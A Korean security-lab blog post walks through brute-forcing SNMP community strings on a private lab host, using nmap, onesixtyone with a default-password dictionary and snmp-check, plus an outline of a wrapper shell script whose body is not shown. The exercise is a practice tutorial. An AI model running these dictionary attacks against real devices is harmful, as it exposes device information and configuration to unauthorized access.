Self-Improvement

onesixtyone을 이용한 SNMP 취약점 실습 및 쉘 스크립트 작성 (Dictionary Attack 이용) 본문

Kali Linux/Tools 실습

onesixtyone을 이용한 SNMP 취약점 실습 및 쉘 스크립트 작성 (Dictionary Attack 이용)

JoGeun 2018. 10. 20. 14:05

*SNMP 취약점 실습
 사전 파일 대입 공격을 이용 (Dictionary Attack)

 //툴 종류
 1.onesixtyone
 2.snmp-check (정보 확인툴)

 (linux)
 #yum -y install net-snmp
 #service snmpd restart
 #service snmptrapd restart
 #chkconfig snmpd on
 #chkconfig snmptrapd on
 실습을 위해 snmp에대해 기본값 사용

 (kali)
 #nmap -sU -p 161 192.168.92.200

 #wireshark &
 #onesixytone --help (사용법을 확인)

 #cd /usr/share/doc/onesixtyone
 #ls dict.txt (벤더사 별로 비밀번호들이 사전파일로 되어있음)
 #onesixtyone -c dict.txt 192.168.92.200 (사전대입파일로 community값을 알아본다)
 public에서 성공한 것을 확인한다. 즉 community값은 public이다.

 wireshark에서도  public에 대한 request에만 response가 온걸 확인 할 수있다.

 #snmp-check -c public -p 161 192.168.92.200 (정보확인)

 ※#snmpwalk으로 사용가능 (기존 snmp CMD)
 ※set을 통해 snmp의 설정을 변경할 수도 있다.

*SNMP의 사전대입공격 간단 스크립트 만들기
 #cd /root/bin
 #vi dict.txt

 
#vi onesixtyone.sh

 #chmod 755 onesixtyone.sh
 #./onesixtyone.sh 192.168.92.200 dict.txt

 ※쉘스크립트로 작성시엔 속도가 느리다.

'Kali Linux > Tools 실습' 카테고리의 다른 글

BurpSuit을 이용한 response 패킷 변조 실습  (0) 2018.10.20
dhcpx을 이용한 DHCP Spoofing 간단 실습  (0) 2018.10.20
ettercap을 이용한 DNS Spoofing 간단 실습  (0) 2018.10.20
Ettercap툴을 이용한 Packet Sniffing  (0) 2018.10.20
Hydra툴을 이용한 Dictionary Attack 간단 실습 (xHydra)  (0) 2018.10.20
'Kali Linux/Tools 실습' Related Articles more